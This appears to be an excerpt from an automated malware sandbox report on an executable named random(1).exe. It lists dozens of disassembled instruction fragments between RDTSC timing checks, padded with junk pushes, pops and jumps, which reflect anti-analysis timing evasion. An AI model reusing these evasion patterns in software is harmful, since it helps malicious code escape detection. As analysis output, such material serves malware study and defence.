Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108F687 second address: 108F6B6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F06D8B4D9C8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov ecx, 48FEDA1Ch 0x00000014 push 00000004h 0x00000016 mov edx, dword ptr [ebp+122D2B63h] 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F06D8B4D9CEh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108F6B6 second address: 108F6BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108F6BA second address: 108F6C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108F6C0 second address: 108F6C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108F6C6 second address: 108F6CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108FA04 second address: 108FA58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 js 00007F06D8518556h 0x0000000b jmp 00007F06D8518550h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007F06D8518548h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b mov dword ptr [ebp+122D215Ah], eax 0x00000031 push 0000001Eh 0x00000033 push edi 0x00000034 xor dword ptr [ebp+122D36F3h], eax 0x0000003a pop ecx 0x0000003b nop 0x0000003c push esi 0x0000003d push eax 0x0000003e push edx 0x0000003f push ecx 0x00000040 pop ecx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108FA58 second address: 108FA66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108FDC6 second address: 108FE88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518558h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F06D851854Ah 0x0000000f nop 0x00000010 jmp 00007F06D851854Dh 0x00000015 lea eax, dword ptr [ebp+124929EEh] 0x0000001b jns 00007F06D8518560h 0x00000021 push eax 0x00000022 jmp 00007F06D8518551h 0x00000027 mov dword ptr [esp], eax 0x0000002a push 00000000h 0x0000002c push ebx 0x0000002d call 00007F06D8518548h 0x00000032 pop ebx 0x00000033 mov dword ptr [esp+04h], ebx 0x00000037 add dword ptr [esp+04h], 0000001Bh 0x0000003f inc ebx 0x00000040 push ebx 0x00000041 ret 0x00000042 pop ebx 0x00000043 ret 0x00000044 mov dword ptr [ebp+12453EE4h], esi 0x0000004a add edx, 371AEF37h 0x00000050 lea eax, dword ptr [ebp+124929AAh] 0x00000056 nop 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F06D8518559h 0x0000005f rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C0AB2 second address: 10C0AD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9CEh 0x00000007 jmp 00007F06D8B4D9D1h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C0AD5 second address: 10C0AEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518555h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C0AEF second address: 10C0B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F06D8B4D9C6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jl 00007F06D8B4D9E2h 0x00000013 push esi 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C0B07 second address: 10C0B14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F06D8518546h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C0B14 second address: 10C0B18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108F231 second address: 108F235 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108F235 second address: 108F244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C0D52 second address: 10C0D6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C0D6B second address: 10C0D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C0D6F second address: 10C0D75 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C0D75 second address: 10C0D94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 jmp 00007F06D8B4D9CCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 pop eax 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C0D94 second address: 10C0D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C0D99 second address: 10C0DAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9CAh 0x00000007 js 00007F06D8B4D9CEh 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C13C5 second address: 10C13FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F06D8518550h 0x00000019 jmp 00007F06D8518551h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C13FA second address: 10C1408 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F06D8B4D9C8h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C1575 second address: 10C158F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F06D8518546h 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F06D851854Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C158F second address: 10C15B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06D8B4D9CDh 0x00000009 jmp 00007F06D8B4D9D0h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C94BA second address: 10C94C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C94C0 second address: 10C94CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F06D8B4D9CAh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C94CF second address: 10C94DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F06D8518546h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C98B1 second address: 10C98B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C98B8 second address: 10C98BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C9A03 second address: 10C9A0E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C9A0E second address: 10C9A14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C9DE3 second address: 10C9DE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C9DE9 second address: 10C9DEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C9DEF second address: 10C9DF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C9F56 second address: 10C9F6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06D8518550h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10CF571 second address: 10CF57B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F06D8B4D9C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10CF57B second address: 10CF585 instructions: 0x00000000 rdtsc 0x00000002 js 00007F06D8518546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10D1E73 second address: 10D1E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10D1E79 second address: 10D1E97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518558h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10D1E97 second address: 10D1EA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F06D8B4D9C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10D1EA3 second address: 10D1EA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10D2038 second address: 10D203C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10D2192 second address: 10D219D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F06D8518546h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10D979D second address: 10D97B8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F06D8B4D9CEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F06D8B4D9C6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10D9EBA second address: 10D9EBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10D9EBE second address: 10D9EF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F06D8B4D9D8h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F06D8B4D9CFh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10D9EF3 second address: 10D9F2A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F06D8518546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F06D851854Ch 0x00000010 push edx 0x00000011 pop edx 0x00000012 jmp 00007F06D8518559h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10D9F2A second address: 10D9F2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DA0D0 second address: 10DA0D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DD703 second address: 10DD707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DD707 second address: 10DD715 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F06D851854Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DD715 second address: 10DD720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DD720 second address: 10DD754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F06D8518553h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jmp 00007F06D851854Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F06D851854Bh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DCD50 second address: 10DCD54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DD01B second address: 10DD025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F06D8518546h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DD025 second address: 10DD03D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9CCh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DD03D second address: 10DD068 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F06D8518555h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DD068 second address: 10DD06C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DD3E2 second address: 10DD405 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Ch 0x00000007 jmp 00007F06D8518550h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DD405 second address: 10DD40B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DD40B second address: 10DD428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D8518558h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DD428 second address: 10DD441 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06D8B4D9D3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DD441 second address: 10DD445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10E1FCB second address: 10E1FD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10E22A2 second address: 10E22A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10E255E second address: 10E2562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10E2562 second address: 10E259A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Ch 0x00000007 jnc 00007F06D8518546h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ecx 0x00000010 pushad 0x00000011 jnc 00007F06D851855Dh 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10E26C7 second address: 10E26E9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F06D8B4D9C6h 0x00000008 jmp 00007F06D8B4D9CCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jns 00007F06D8B4D9CCh 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10E26E9 second address: 10E26EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10E26EF second address: 10E26F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EBBD1 second address: 10EBBF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c jc 00007F06D8518546h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop esi 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EBBF3 second address: 10EBBFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EBBFB second address: 10EBC00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10E9B6D second address: 10E9B72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10E9B72 second address: 10E9B7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F06D8518546h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EA0E7 second address: 10EA131 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F06D8B4D9D7h 0x0000000f jmp 00007F06D8B4D9D1h 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 ja 00007F06D8B4D9C6h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 jng 00007F06D8B4D9C6h 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EA47B second address: 10EA499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007F06D8518556h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EAD00 second address: 10EAD05 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EB27F second address: 10EB2A4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F06D8518551h 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F06D851854Eh 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EB2A4 second address: 10EB2AA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EB8A0 second address: 10EB8B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jp 00007F06D8518546h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EB8B0 second address: 10EB8BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F06D8B4D9C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EB8BC second address: 10EB8C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EB8C2 second address: 10EB8E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 jmp 00007F06D8B4D9D7h 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EFBC7 second address: 10EFBCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EFBCB second address: 10EFBD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EEE5A second address: 10EEE5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EEFCD second address: 10EEFE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D8B4D9D5h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EEFE7 second address: 10EEFED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EEFED second address: 10EEFF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EF169 second address: 10EF16F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EF2A5 second address: 10EF2CD instructions: 0x00000000 rdtsc 0x00000002 jne 00007F06D8B4D9DBh 0x00000008 jmp 00007F06D8B4D9CFh 0x0000000d jo 00007F06D8B4D9C6h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push ebx 0x00000016 jne 00007F06D8B4D9CCh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
